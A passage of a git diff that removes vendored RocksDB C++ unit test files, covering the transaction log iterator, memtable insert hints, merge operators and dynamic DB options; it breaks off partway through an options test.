-  for (int test = 0; test < LOG_ITERATOR_RACE_TEST_COUNT; ++test) {
-    // Setup sync point dependency to reproduce the race condition of
-    // a log file moved to archived dir, in the middle of GetSortedWalFiles
-    rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      { { sync_points[test][0], sync_points[test][1] },
-        { sync_points[test][2], sync_points[test][3] },
-      });
-
-    do {
-      rocksdb::SyncPoint::GetInstance()->ClearTrace();
-      rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-      Options options = OptionsForLogIterTest();
-      DestroyAndReopen(options);
-      Put("key1", DummyString(1024));
-      dbfull()->Flush(FlushOptions());
-      Put("key2", DummyString(1024));
-      dbfull()->Flush(FlushOptions());
-      Put("key3", DummyString(1024));
-      dbfull()->Flush(FlushOptions());
-      Put("key4", DummyString(1024));
-      ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 4U);
-      dbfull()->FlushWAL(false);
-
-      {
-        auto iter = OpenTransactionLogIter(0);
-        ExpectRecords(4, iter);
-      }
-
-      rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-      // trigger async flush, and log move. Well, log move will
-      // wait until the GetSortedWalFiles:1 to reproduce the race
-      // condition
-      FlushOptions flush_options;
-      flush_options.wait = false;
-      dbfull()->Flush(flush_options);
-
-      // "key5" would be written in a new memtable and log
-      Put("key5", DummyString(1024));
-      dbfull()->FlushWAL(false);
-      {
-        // this iter would miss "key4" if not fixed
-        auto iter = OpenTransactionLogIter(0);
-        ExpectRecords(5, iter);
-      }
-    } while (ChangeCompactOptions());
-  }
-}
-#endif
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorStallAtLastRecord) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    Put("key1", DummyString(1024));
-    auto iter = OpenTransactionLogIter(0);
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-    iter->Next();
-    ASSERT_TRUE(!iter->Valid());
-    ASSERT_OK(iter->status());
-    Put("key2", DummyString(1024));
-    iter->Next();
-    ASSERT_OK(iter->status());
-    ASSERT_TRUE(iter->Valid());
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorCheckAfterRestart) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    Put("key1", DummyString(1024));
-    Put("key2", DummyString(1023));
-    dbfull()->Flush(FlushOptions());
-    Reopen(options);
-    auto iter = OpenTransactionLogIter(0);
-    ExpectRecords(2, iter);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorCorruptedLog) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    for (int i = 0; i < 1024; i++) {
-      Put("key"+ToString(i), DummyString(10));
-    }
-    dbfull()->Flush(FlushOptions());
-    dbfull()->FlushWAL(false);
-    // Corrupt this log to create a gap
-    rocksdb::VectorLogPtr wal_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-    const auto logfile_path = dbname_ + "/" + wal_files.front()->PathName();
-    if (mem_env_) {
-      mem_env_->Truncate(logfile_path, wal_files.front()->SizeFileBytes() / 2);
-    } else {
-      ASSERT_EQ(0, truncate(logfile_path.c_str(),
-                   wal_files.front()->SizeFileBytes() / 2));
-    }
-
-    // Insert a new entry to a new log file
-    Put("key1025", DummyString(10));
-    dbfull()->FlushWAL(false);
-    // Try to read from the beginning. Should stop before the gap and read less
-    // than 1025 entries
-    auto iter = OpenTransactionLogIter(0);
-    int count;
-    SequenceNumber last_sequence_read = ReadRecords(iter, count);
-    ASSERT_LT(last_sequence_read, 1025U);
-    // Try to read past the gap, should be able to seek to key1025
-    auto iter2 = OpenTransactionLogIter(last_sequence_read + 1);
-    ExpectRecords(1, iter2);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorBatchOperations) {
-  do {
-    Options options = OptionsForLogIterTest();
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    WriteBatch batch;
-    batch.Put(handles_[1], "key1", DummyString(1024));
-    batch.Put(handles_[0], "key2", DummyString(1024));
-    batch.Put(handles_[1], "key3", DummyString(1024));
-    batch.Delete(handles_[0], "key2");
-    dbfull()->Write(WriteOptions(), &batch);
-    Flush(1);
-    Flush(0);
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-    Put(1, "key4", DummyString(1024));
-    auto iter = OpenTransactionLogIter(3);
-    ExpectRecords(2, iter);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestXactLogIterator, TransactionLogIteratorBlobs) {
-  Options options = OptionsForLogIterTest();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-  {
-    WriteBatch batch;
-    batch.Put(handles_[1], "key1", DummyString(1024));
-    batch.Put(handles_[0], "key2", DummyString(1024));
-    batch.PutLogData(Slice("blob1"));
-    batch.Put(handles_[1], "key3", DummyString(1024));
-    batch.PutLogData(Slice("blob2"));
-    batch.Delete(handles_[0], "key2");
-    dbfull()->Write(WriteOptions(), &batch);
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  }
-
-  auto res = OpenTransactionLogIter(0)->GetBatch();
-  struct Handler : public WriteBatch::Handler {
-    std::string seen;
-    virtual Status PutCF(uint32_t cf, const Slice& key,
-                         const Slice& value) override {
-      seen += "Put(" + ToString(cf) + ", " + key.ToString() + ", " +
-              ToString(value.size()) + ")";
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t cf, const Slice& key,
-                           const Slice& value) override {
-      seen += "Merge(" + ToString(cf) + ", " + key.ToString() + ", " +
-              ToString(value.size()) + ")";
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      seen += "LogData(" + blob.ToString() + ")";
-    }
-    virtual Status DeleteCF(uint32_t cf, const Slice& key) override {
-      seen += "Delete(" + ToString(cf) + ", " + key.ToString() + ")";
-      return Status::OK();
-    }
-  } handler;
-  res.writeBatchPtr->Iterate(&handler);
-  ASSERT_EQ(
-      "Put(1, key1, 1024)"
-      "Put(0, key2, 1024)"
-      "LogData(blob1)"
-      "Put(1, key3, 1024)"
-      "LogData(blob2)"
-      "Delete(0, key2)",
-      handler.seen);
-}
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_memtable_test.cc b/thirdparty/rocksdb/db/db_memtable_test.cc
deleted file mode 100644
index 63d274f..0000000
--- a/thirdparty/rocksdb/db/db_memtable_test.cc
+++ /dev/null
@@ -1,195 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include <string>
-
-#include "db/db_test_util.h"
-#include "db/memtable.h"
-#include "port/stack_trace.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice_transform.h"
-
-namespace rocksdb {
-
-class DBMemTableTest : public DBTestBase {
- public:
-  DBMemTableTest() : DBTestBase("/db_memtable_test") {}
-};
-
-class MockMemTableRep : public MemTableRep {
- public:
-  explicit MockMemTableRep(Allocator* allocator, MemTableRep* rep)
-      : MemTableRep(allocator), rep_(rep), num_insert_with_hint_(0) {}
-
-  virtual KeyHandle Allocate(const size_t len, char** buf) override {
-    return rep_->Allocate(len, buf);
-  }
-
-  virtual void Insert(KeyHandle handle) override {
-    return rep_->Insert(handle);
-  }
-
-  virtual void InsertWithHint(KeyHandle handle, void** hint) override {
-    num_insert_with_hint_++;
-    ASSERT_NE(nullptr, hint);
-    last_hint_in_ = *hint;
-    rep_->InsertWithHint(handle, hint);
-    last_hint_out_ = *hint;
-  }
-
-  virtual bool Contains(const char* key) const override {
-    return rep_->Contains(key);
-  }
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override {
-    rep_->Get(k, callback_args, callback_func);
-  }
-
-  virtual size_t ApproximateMemoryUsage() override {
-    return rep_->ApproximateMemoryUsage();
-  }
-
-  virtual Iterator* GetIterator(Arena* arena) override {
-    return rep_->GetIterator(arena);
-  }
-
-  void* last_hint_in() { return last_hint_in_; }
-  void* last_hint_out() { return last_hint_out_; }
-  int num_insert_with_hint() { return num_insert_with_hint_; }
-
- private:
-  std::unique_ptr<MemTableRep> rep_;
-  void* last_hint_in_;
-  void* last_hint_out_;
-  int num_insert_with_hint_;
-};
-
-class MockMemTableRepFactory : public MemTableRepFactory {
- public:
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator& cmp,
-                                         Allocator* allocator,
-                                         const SliceTransform* transform,
-                                         Logger* logger) override {
-    SkipListFactory factory;
-    MemTableRep* skiplist_rep =
-        factory.CreateMemTableRep(cmp, allocator, transform, logger);
-    mock_rep_ = new MockMemTableRep(allocator, skiplist_rep);
-    return mock_rep_;
-  }
-
-  virtual MemTableRep* CreateMemTableRep(const MemTableRep::KeyComparator& cmp,
-                                         Allocator* allocator,
-                                         const SliceTransform* transform,
-                                         Logger* logger,
-                                         uint32_t column_family_id) override {
-    last_column_family_id_ = column_family_id;
-    return CreateMemTableRep(cmp, allocator, transform, logger);
-  }
-
-  virtual const char* Name() const override { return "MockMemTableRepFactory"; }
-
-  MockMemTableRep* rep() { return mock_rep_; }
-
-  bool IsInsertConcurrentlySupported() const override { return false; }
-
-  uint32_t GetLastColumnFamilyId() { return last_column_family_id_; }
-
- private:
-  MockMemTableRep* mock_rep_;
-  // workaround since there's no port::kMaxUint32 yet.
-  uint32_t last_column_family_id_ = static_cast<uint32_t>(-1);
-};
-
-class TestPrefixExtractor : public SliceTransform {
- public:
-  virtual const char* Name() const override { return "TestPrefixExtractor"; }
-
-  virtual Slice Transform(const Slice& key) const override {
-    const char* p = separator(key);
-    if (p == nullptr) {
-      return Slice();
-    }
-    return Slice(key.data(), p - key.data() + 1);
-  }
-
-  virtual bool InDomain(const Slice& key) const override {
-    return separator(key) != nullptr;
-  }
-
-  virtual bool InRange(const Slice& key) const override { return false; }
-
- private:
-  const char* separator(const Slice& key) const {
-    return reinterpret_cast<const char*>(memchr(key.data(), '_', key.size()));
-  }
-};
-
-TEST_F(DBMemTableTest, InsertWithHint) {
-  Options options;
-  options.allow_concurrent_memtable_write = false;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(new MockMemTableRepFactory());
-  options.memtable_insert_with_hint_prefix_extractor.reset(
-      new TestPrefixExtractor());
-  options.env = env_;
-  Reopen(options);
-  MockMemTableRep* rep =
-      reinterpret_cast<MockMemTableRepFactory*>(options.memtable_factory.get())
-          ->rep();
-  ASSERT_OK(Put("foo_k1", "foo_v1"));
-  ASSERT_EQ(nullptr, rep->last_hint_in());
-  void* hint_foo = rep->last_hint_out();
-  ASSERT_OK(Put("foo_k2", "foo_v2"));
-  ASSERT_EQ(hint_foo, rep->last_hint_in());
-  ASSERT_EQ(hint_foo, rep->last_hint_out());
-  ASSERT_OK(Put("foo_k3", "foo_v3"));
-  ASSERT_EQ(hint_foo, rep->last_hint_in());
-  ASSERT_EQ(hint_foo, rep->last_hint_out());
-  ASSERT_OK(Put("bar_k1", "bar_v1"));
-  ASSERT_EQ(nullptr, rep->last_hint_in());
-  void* hint_bar = rep->last_hint_out();
-  ASSERT_NE(hint_foo, hint_bar);
-  ASSERT_OK(Put("bar_k2", "bar_v2"));
-  ASSERT_EQ(hint_bar, rep->last_hint_in());
-  ASSERT_EQ(hint_bar, rep->last_hint_out());
-  ASSERT_EQ(5, rep->num_insert_with_hint());
-  ASSERT_OK(Put("whitelisted", "vvv"));
-  ASSERT_EQ(5, rep->num_insert_with_hint());
-  ASSERT_EQ("foo_v1", Get("foo_k1"));
-  ASSERT_EQ("foo_v2", Get("foo_k2"));
-  ASSERT_EQ("foo_v3", Get("foo_k3"));
-  ASSERT_EQ("bar_v1", Get("bar_k1"));
-  ASSERT_EQ("bar_v2", Get("bar_k2"));
-  ASSERT_EQ("vvv", Get("whitelisted"));
-}
-
-TEST_F(DBMemTableTest, ColumnFamilyId) {
-  // Verifies MemTableRepFactory is told the right column family id.
-  Options options;
-  options.allow_concurrent_memtable_write = false;
-  options.create_if_missing = true;
-  options.memtable_factory.reset(new MockMemTableRepFactory());
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (int cf = 0; cf < 2; ++cf) {
-    ASSERT_OK(Put(cf, "key", "val"));
-    ASSERT_OK(Flush(cf));
-    ASSERT_EQ(
-        cf, static_cast<MockMemTableRepFactory*>(options.memtable_factory.get())
-                ->GetLastColumnFamilyId());
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_merge_operator_test.cc b/thirdparty/rocksdb/db/db_merge_operator_test.cc
deleted file mode 100644
index de28619..0000000
--- a/thirdparty/rocksdb/db/db_merge_operator_test.cc
+++ /dev/null
@@ -1,367 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#include <string>
-#include <vector>
-
-#include "db/db_test_util.h"
-#include "db/forward_iterator.h"
-#include "port/stack_trace.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// Test merge operator functionality.
-class DBMergeOperatorTest : public DBTestBase {
- public:
-  DBMergeOperatorTest() : DBTestBase("/db_merge_operator_test") {}
-};
-
-TEST_F(DBMergeOperatorTest, MergeErrorOnRead) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new TestPutOperator());
-  options.env = env_;
-  Reopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Merge("k1", "corrupted"));
-  std::string value;
-  ASSERT_TRUE(db_->Get(ReadOptions(), "k1", &value).IsCorruption());
-  VerifyDBInternal({{"k1", "corrupted"}, {"k1", "v1"}});
-}
-
-TEST_F(DBMergeOperatorTest, MergeErrorOnWrite) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new TestPutOperator());
-  options.max_successive_merges = 3;
-  options.env = env_;
-  Reopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Merge("k1", "v2"));
-  // Will trigger a merge when hitting max_successive_merges and the merge
-  // will fail. The delta will be inserted nevertheless.
-  ASSERT_OK(Merge("k1", "corrupted"));
-  // Data should stay unmerged after the error.
-  VerifyDBInternal({{"k1", "corrupted"}, {"k1", "v2"}, {"k1", "v1"}});
-}
-
-TEST_F(DBMergeOperatorTest, MergeErrorOnIteration) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator.reset(new TestPutOperator());
-  options.env = env_;
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Merge("k1", "corrupted"));
-  ASSERT_OK(Put("k2", "v2"));
-  VerifyDBFromMap({{"k1", ""}, {"k2", "v2"}}, nullptr, false,
-                  {{"k1", Status::Corruption()}});
-  VerifyDBInternal({{"k1", "corrupted"}, {"k1", "v1"}, {"k2", "v2"}});
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Merge("k1", "v1"));
-  ASSERT_OK(Put("k2", "v2"));
-  ASSERT_OK(Merge("k2", "corrupted"));
-  VerifyDBFromMap({{"k1", "v1"}, {"k2", ""}}, nullptr, false,
-                  {{"k2", Status::Corruption()}});
-  VerifyDBInternal({{"k1", "v1"}, {"k2", "corrupted"}, {"k2", "v2"}});
-}
-
-
-class MergeOperatorPinningTest : public DBMergeOperatorTest,
-                                 public testing::WithParamInterface<bool> {
- public:
-  MergeOperatorPinningTest() { disable_block_cache_ = GetParam(); }
-
-  bool disable_block_cache_;
-};
-
-INSTANTIATE_TEST_CASE_P(MergeOperatorPinningTest, MergeOperatorPinningTest,
-                        ::testing::Bool());
-
-#ifndef ROCKSDB_LITE
-TEST_P(MergeOperatorPinningTest, OperandsMultiBlocks) {
-  Options options = CurrentOptions();
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1;  // every block will contain one entry
-  table_options.no_block_cache = disable_block_cache_;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.merge_operator = MergeOperators::CreateStringAppendTESTOperator();
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  const int kKeysPerFile = 10;
-  const int kOperandsPerKeyPerFile = 7;
-  const int kOperandSize = 100;
-  // Filse to write in L0 before compacting to lower level
-  const int kFilesPerLevel = 3;
-
-  Random rnd(301);
-  std::map<std::string, std::string> true_data;
-  int batch_num = 1;
-  int lvl_to_fill = 4;
-  int key_id = 0;
-  while (true) {
-    for (int j = 0; j < kKeysPerFile; j++) {
-      std::string key = Key(key_id % 35);
-      key_id++;
-      for (int k = 0; k < kOperandsPerKeyPerFile; k++) {
-        std::string val = RandomString(&rnd, kOperandSize);
-        ASSERT_OK(db_->Merge(WriteOptions(), key, val));
-        if (true_data[key].size() == 0) {
-          true_data[key] = val;
-        } else {
-          true_data[key] += "," + val;
-        }
-      }
-    }
-
-    if (lvl_to_fill == -1) {
-      // Keep last batch in memtable and stop
-      break;
-    }
-
-    ASSERT_OK(Flush());
-    if (batch_num % kFilesPerLevel == 0) {
-      if (lvl_to_fill != 0) {
-        MoveFilesToLevel(lvl_to_fill);
-      }
-      lvl_to_fill--;
-    }
-    batch_num++;
-  }
-
-  // 3 L0 files
-  // 1 L1 file
-  // 3 L2 files
-  // 1 L3 file
-  // 3 L4 Files
-  ASSERT_EQ(FilesPerLevel(), "3,1,3,1,3");
-
-  VerifyDBFromMap(true_data);
-}
-
-TEST_P(MergeOperatorPinningTest, Randomized) {
-  do {
-    Options options = CurrentOptions();
-    options.merge_operator = MergeOperators::CreateMaxOperator();
-    BlockBasedTableOptions table_options;
-    table_options.no_block_cache = disable_block_cache_;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    std::map<std::string, std::string> true_data;
-
-    const int kTotalMerges = 10000;
-    // Every key gets ~10 operands
-    const int kKeyRange = kTotalMerges / 10;
-    const int kOperandSize = 20;
-    const int kNumPutBefore = kKeyRange / 10;  // 10% value
-    const int kNumPutAfter = kKeyRange / 10;   // 10% overwrite
-    const int kNumDelete = kKeyRange / 10;     // 10% delete
-
-    // kNumPutBefore keys will have base values
-    for (int i = 0; i < kNumPutBefore; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      std::string value = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-      true_data[key] = value;
-    }
-
-    // Do kTotalMerges merges
-    for (int i = 0; i < kTotalMerges; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      std::string value = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Merge(WriteOptions(), key, value));
-
-      if (true_data[key] < value) {
-        true_data[key] = value;
-      }
-    }
-
-    // Overwrite random kNumPutAfter keys
-    for (int i = 0; i < kNumPutAfter; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      std::string value = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Put(WriteOptions(), key, value));
-
-      true_data[key] = value;
-    }
-
-    // Delete random kNumDelete keys
-    for (int i = 0; i < kNumDelete; i++) {
-      std::string key = Key(rnd.Next() % kKeyRange);
-      ASSERT_OK(db_->Delete(WriteOptions(), key));
-
-      true_data.erase(key);
-    }
-
-    VerifyDBFromMap(true_data);
-
-    // Skip HashCuckoo since it does not support merge operators
-  } while (ChangeOptions(kSkipMergePut | kSkipHashCuckoo));
-}
-
-class MergeOperatorHook : public MergeOperator {
- public:
-  explicit MergeOperatorHook(std::shared_ptr<MergeOperator> _merge_op)
-      : merge_op_(_merge_op) {}
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    before_merge_();
-    bool res = merge_op_->FullMergeV2(merge_in, merge_out);
-    after_merge_();
-    return res;
-  }
-
-  virtual const char* Name() const override { return merge_op_->Name(); }
-
-  std::shared_ptr<MergeOperator> merge_op_;
-  std::function<void()> before_merge_ = []() {};
-  std::function<void()> after_merge_ = []() {};
-};
-
-TEST_P(MergeOperatorPinningTest, EvictCacheBeforeMerge) {
-  Options options = CurrentOptions();
-
-  auto merge_hook =
-      std::make_shared<MergeOperatorHook>(MergeOperators::CreateMaxOperator());
-  options.merge_operator = merge_hook;
-  options.disable_auto_compactions = true;
-  options.level0_slowdown_writes_trigger = (1 << 30);
-  options.level0_stop_writes_trigger = (1 << 30);
-  options.max_open_files = 20;
-  BlockBasedTableOptions bbto;
-  bbto.no_block_cache = disable_block_cache_;
-  if (bbto.no_block_cache == false) {
-    bbto.block_cache = NewLRUCache(64 * 1024 * 1024);
-  } else {
-    bbto.block_cache = nullptr;
-  }
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyAndReopen(options);
-
-  const int kNumOperands = 30;
-  const int kNumKeys = 1000;
-  const int kOperandSize = 100;
-  Random rnd(301);
-
-  // 1000 keys every key have 30 operands, every operand is in a different file
-  std::map<std::string, std::string> true_data;
-  for (int i = 0; i < kNumOperands; i++) {
-    for (int j = 0; j < kNumKeys; j++) {
-      std::string k = Key(j);
-      std::string v = RandomString(&rnd, kOperandSize);
-      ASSERT_OK(db_->Merge(WriteOptions(), k, v));
-
-      true_data[k] = std::max(true_data[k], v);
-    }
-    ASSERT_OK(Flush());
-  }
-
-  std::vector<uint64_t> file_numbers = ListTableFiles(env_, dbname_);
-  ASSERT_EQ(file_numbers.size(), kNumOperands);
-  int merge_cnt = 0;
-
-  // Code executed before merge operation
-  merge_hook->before_merge_ = [&]() {
-    // Evict all tables from cache before every merge operation
-    for (uint64_t num : file_numbers) {
-      TableCache::Evict(dbfull()->TEST_table_cache(), num);
-    }
-    // Decrease cache capacity to force all unrefed blocks to be evicted
-    if (bbto.block_cache) {
-      bbto.block_cache->SetCapacity(1);
-    }
-    merge_cnt++;
-  };
-
-  // Code executed after merge operation
-  merge_hook->after_merge_ = [&]() {
-    // Increase capacity again after doing the merge
-    if (bbto.block_cache) {
-      bbto.block_cache->SetCapacity(64 * 1024 * 1024);
-    }
-  };
-
-  size_t total_reads;
-  VerifyDBFromMap(true_data, &total_reads);
-  ASSERT_EQ(merge_cnt, total_reads);
-
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  VerifyDBFromMap(true_data, &total_reads);
-}
-
-TEST_P(MergeOperatorPinningTest, TailingIterator) {
-  Options options = CurrentOptions();
-  options.merge_operator = MergeOperators::CreateMaxOperator();
-  BlockBasedTableOptions bbto;
-  bbto.no_block_cache = disable_block_cache_;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  DestroyAndReopen(options);
-
-  const int kNumOperands = 100;
-  const int kNumWrites = 100000;
-
-  std::function<void()> writer_func = [&]() {
-    int k = 0;
-    for (int i = 0; i < kNumWrites; i++) {
-      db_->Merge(WriteOptions(), Key(k), Key(k));
-
-      if (i && i % kNumOperands == 0) {
-        k++;
-      }
-      if (i && i % 127 == 0) {
-        ASSERT_OK(Flush());
-      }
-      if (i && i % 317 == 0) {
-        ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-      }
-    }
-  };
-
-  std::function<void()> reader_func = [&]() {
-    ReadOptions ro;
-    ro.tailing = true;
-    Iterator* iter = db_->NewIterator(ro);
-
-    iter->SeekToFirst();
-    for (int i = 0; i < (kNumWrites / kNumOperands); i++) {
-      while (!iter->Valid()) {
-        // wait for the key to be written
-        env_->SleepForMicroseconds(100);
-        iter->Seek(Key(i));
-      }
-      ASSERT_EQ(iter->key(), Key(i));
-      ASSERT_EQ(iter->value(), Key(i));
-
-      iter->Next();
-    }
-
-    delete iter;
-  };
-
-  rocksdb::port::Thread writer_thread(writer_func);
-  rocksdb::port::Thread reader_thread(reader_func);
-
-  writer_thread.join();
-  reader_thread.join();
-}
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_options_test.cc b/thirdparty/rocksdb/db/db_options_test.cc
deleted file mode 100644
index 243748f..0000000
--- a/thirdparty/rocksdb/db/db_options_test.cc
+++ /dev/null
@@ -1,452 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include <limits>
-#include <string>
-#include <unordered_map>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "options/options_helper.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/rate_limiter.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class DBOptionsTest : public DBTestBase {
- public:
-  DBOptionsTest() : DBTestBase("/db_options_test") {}
-
-#ifndef ROCKSDB_LITE
-  std::unordered_map<std::string, std::string> GetMutableDBOptionsMap(
-      const DBOptions& options) {
-    std::string options_str;
-    GetStringFromDBOptions(&options_str, options);
-    std::unordered_map<std::string, std::string> options_map;
-    StringToMap(options_str, &options_map);
-    std::unordered_map<std::string, std::string> mutable_map;
-    for (const auto opt : db_options_type_info) {
-      if (opt.second.is_mutable &&
-          opt.second.verification != OptionVerificationType::kDeprecated) {
-        mutable_map[opt.first] = options_map[opt.first];
-      }
-    }
-    return mutable_map;
-  }
-
-  std::unordered_map<std::string, std::string> GetMutableCFOptionsMap(
-      const ColumnFamilyOptions& options) {
-    std::string options_str;
-    GetStringFromColumnFamilyOptions(&options_str, options);
-    std::unordered_map<std::string, std::string> options_map;
-    StringToMap(options_str, &options_map);
-    std::unordered_map<std::string, std::string> mutable_map;
-    for (const auto opt : cf_options_type_info) {
-      if (opt.second.is_mutable &&
-          opt.second.verification != OptionVerificationType::kDeprecated) {
-        mutable_map[opt.first] = options_map[opt.first];
-      }
-    }
-    return mutable_map;
-  }
-
-  std::unordered_map<std::string, std::string> GetRandomizedMutableCFOptionsMap(
-      Random* rnd) {
-    Options options;
-    options.env = env_;
-    ImmutableDBOptions db_options(options);
-    test::RandomInitCFOptions(&options, rnd);
-    auto sanitized_options = SanitizeOptions(db_options, options);
-    auto opt_map = GetMutableCFOptionsMap(sanitized_options);
-    delete options.compaction_filter;
-    return opt_map;
-  }
-
-  std::unordered_map<std::string, std::string> GetRandomizedMutableDBOptionsMap(
-      Random* rnd) {
-    DBOptions db_options;
-    test::RandomInitDBOptions(&db_options, rnd);
-    auto sanitized_options = SanitizeOptions(dbname_, db_options);
-    return GetMutableDBOptionsMap(sanitized_options);
-  }
-#endif  // ROCKSDB_LITE
-};
-
-// RocksDB lite don't support dynamic options.
-#ifndef ROCKSDB_LITE
-
-TEST_F(DBOptionsTest, GetLatestDBOptions) {
-  // GetOptions should be able to get latest option changed by SetOptions.
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  Random rnd(228);
-  Reopen(options);
-  auto new_options = GetRandomizedMutableDBOptionsMap(&rnd);
-  ASSERT_OK(dbfull()->SetDBOptions(new_options));
-  ASSERT_EQ(new_options, GetMutableDBOptionsMap(dbfull()->GetDBOptions()));
-}
-
-TEST_F(DBOptionsTest, GetLatestCFOptions) {
-  // GetOptions should be able to get latest option changed by SetOptions.
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  Random rnd(228);
-  Reopen(options);
-  CreateColumnFamilies({"foo"}, options);
-  ReopenWithColumnFamilies({"default", "foo"}, options);
-  auto options_default = GetRandomizedMutableCFOptionsMap(&rnd);
-  auto options_foo = GetRandomizedMutableCFOptionsMap(&rnd);
-  ASSERT_OK(dbfull()->SetOptions(handles_[0], options_default));
-  ASSERT_OK(dbfull()->SetOptions(handles_[1], options_foo));
-  ASSERT_EQ(options_default,
-            GetMutableCFOptionsMap(dbfull()->GetOptions(handles_[0])));
-  ASSERT_EQ(options_foo,
-            GetMutableCFOptionsMap(dbfull()->GetOptions(handles_[1])));
-}
-
-TEST_F(DBOptionsTest, SetOptionsAndReopen) {
-  Random rnd(1044);
-  auto rand_opts = GetRandomizedMutableCFOptionsMap(&rnd);
-  ASSERT_OK(dbfull()->SetOptions(rand_opts));
-  // Verify if DB can be reopen after setting options.
-  Options options;
-  options.env = env_;
-  ASSERT_OK(TryReopen(options));
-}
-
-TEST_F(DBOptionsTest, EnableAutoCompactionAndTriggerStall) {
-  const std::string kValue(1024, 'v');
-  for (int method_type = 0; method_type < 2; method_type++) {
-    for (int option_type = 0; option_type < 4; option_type++) {
-      Options options;
-      options.create_if_missing = true;
-      options.disable_auto_compactions = true;
